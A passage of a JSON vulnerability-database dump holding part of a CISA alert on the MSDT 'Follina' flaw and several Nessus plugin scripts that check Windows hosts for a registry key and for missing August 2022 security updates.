A remote, unauthenticated attacker could exploit this vulnerability to take control of an affected system. Microsoft has reported active exploitation of this vulnerability in the wild.\n\nCISA urges users and administrators to review Microsoft's [Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) and apply the necessary workaround. \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T00:00:00", "type": "cisa", "title": "Microsoft Releases Workaround Guidance for MSDT \"Follina\" Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-31T00:00:00", "id": "CISA:F30D0D7B72453DC3FC64D2AC1AA31F33", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-08-01T18:57:16", "description": "The remote host has the HKEY_CLASSES_ROOT\\ms-msdt registry key. This is a known exposure for CVE-2022-30190.\n\nNote that Nessus has not tested for CVE-2022-30190. It is only checking if the registry key exists. The recommendation is to apply the latest patch.", "cvss3": {}, "published": "2022-05-31T00:00:00", "type": "nessus", "title": "The Microsoft Windows Support Diagnostic Tool (MSDT) RCE Workaround Detection (CVE-2022-30190)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-07-28T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*", "x-cpe:2.3:a:microsoft:msdt:*:*:*:*:*:*:*:*"], "id": "MSDT_RCE_CVE_2022-30190_REG_CHECK.NASL", "href": "https://www.tenable.com/plugins/nessus/161691", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161691);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/28\");\n\n script_name(english:\"The Microsoft Windows Support Diagnostic Tool (MSDT) RCE Workaround Detection (CVE-2022-30190)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Checks for the HKEY_CLASSES_ROOT\\ms-msdt registry key.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has the HKEY_CLASSES_ROOT\\ms-msdt registry key. This is a known exposure for CVE-2022-30190.\n\nNote that Nessus has not tested for CVE-2022-30190. It is only checking if the registry key exists. 
The recommendation is\nto apply the latest patch.\");\n # https://community.tenable.com/s/article/Microsoft-CVE-2022-30190-Patch-and-Workaround-Plugin-Advisement\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?440e4ba1\");\n # https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190\");\n # https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9345997\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the latest Cumulative Update.\");\n\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:microsoft:msdt\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_windows_defender_win_installed.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\ninclude('smb_reg_query.inc');\ninclude('spad_log_func.inc');\ninclude('smb_func.inc');\n\nregistry_init();\nvar hkcr = registry_hive_connect(hive:HKEY_CLASS_ROOT, exit_on_fail:TRUE);\n\nif (!registry_key_exists(handle:hkcr, key:'ms-msdt'))\n{\n spad_log(message:'HKEY_CLASSES_ROOT\\\\ms-msdt does not exist, auditing');\n close_registry();\n audit(AUDIT_OS_CONF_NOT_VULN, 'Windows');\n}\n\nvar report = 'The HKEY_CLASSES_ROOT\\\\ms-msdt registry key exists on the target. This may indicate that the target is' +\n ' vulnerable to CVE-2022-30190, if the vendor patch is not applied.';\n\nvar port = kb_smb_transport();\nclose_registry();\nsecurity_report_v4(severity:SECURITY_NOTE, extra:report, port:port);\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:27:36", "description": "The remote Windows host is missing security update 5016679. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows WebBrowser Control Remote Code Execution Vulnerability (CVE-2022-30194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016679: Windows 7 and Windows Server 2008 R2 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30194", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35747", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35756", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35793", "CVE-2022-35795", "CVE-2022-35820"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016679.NASL", "href": "https://www.tenable.com/plugins/nessus/163952", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163952);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30194\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35747\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35756\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35793\",\n \"CVE-2022-35795\",\n \"CVE-2022-35820\"\n );\n script_xref(name:\"MSKB\", value:\"5016676\");\n script_xref(name:\"MSKB\", value:\"5016679\");\n script_xref(name:\"MSFT\", value:\"MS22-5016676\");\n script_xref(name:\"MSFT\", value:\"MS22-5016679\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016679: Windows 7 and Windows Server 2008 R2 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016679. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows WebBrowser Control Remote Code Execution Vulnerability (CVE-2022-30194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016676\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016679\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016676\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016679\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016679 or Cumulative Update 5016676\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016679',\n '5016676'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016679, 5016676])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:25:58", "description": "The remote Windows host is missing security update 5016684. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows WebBrowser Control Remote Code Execution Vulnerability (CVE-2022-30194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016684: Windows Server 2012 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30194", "CVE-2022-33670", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35756", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35793", "CVE-2022-35795", "CVE-2022-35820"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016684.NASL", "href": "https://www.tenable.com/plugins/nessus/163948", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin 
were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163948);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30194\",\n \"CVE-2022-33670\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35748\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35756\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35793\",\n \"CVE-2022-35795\",\n \"CVE-2022-35820\"\n );\n script_xref(name:\"MSKB\", value:\"5016672\");\n script_xref(name:\"MSKB\", value:\"5016684\");\n script_xref(name:\"MSFT\", value:\"MS22-5016672\");\n script_xref(name:\"MSFT\", value:\"MS22-5016684\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016684: Windows Server 2012 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016684. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows WebBrowser Control Remote Code Execution Vulnerability (CVE-2022-30194)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016672\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016684\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016672\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016684\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016684 or Cumulative Update 5016672\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016684',\n '5016672'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016684, 5016672])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:26:49", "description": "The remote Windows host is missing security update 5016683. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016683: Windows Server 2012 R2 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-33670", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35793", "CVE-2022-35795", "CVE-2022-35820"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016683.NASL", "href": "https://www.tenable.com/plugins/nessus/163947", "sourceData": "##\n# (C) Tenable, 
Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163947);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30144\",\n \"CVE-2022-30194\",\n \"CVE-2022-33670\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35748\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35793\",\n \"CVE-2022-35795\",\n \"CVE-2022-35820\"\n );\n script_xref(name:\"MSKB\", value:\"5016681\");\n script_xref(name:\"MSKB\", value:\"5016683\");\n script_xref(name:\"MSFT\", value:\"MS22-5016681\");\n script_xref(name:\"MSFT\", value:\"MS22-5016683\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016683: Windows Server 2012 R2 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016683. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016681\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016683\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016681\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016683\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016683 or Cumulative Update 5016681\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016683',\n '5016681'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) 